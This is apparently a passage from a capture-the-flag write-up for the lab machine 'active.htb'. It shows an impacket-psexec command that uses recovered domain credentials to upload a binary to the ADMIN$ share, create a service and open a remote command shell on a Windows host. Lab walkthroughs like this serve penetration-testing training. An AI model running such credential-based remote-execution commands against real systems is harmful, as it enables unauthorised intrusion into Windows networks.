AD Shell

Getting Shell

Now we have writable shares and credentials so, we can use psexec to get the shell as well.

└─$ impacket-psexec active.htb/[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file QDdDNPEh.exe
[*] Opening SVCManager on
[*] Creating service REEo on
[*] Starting service REEo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


Last updated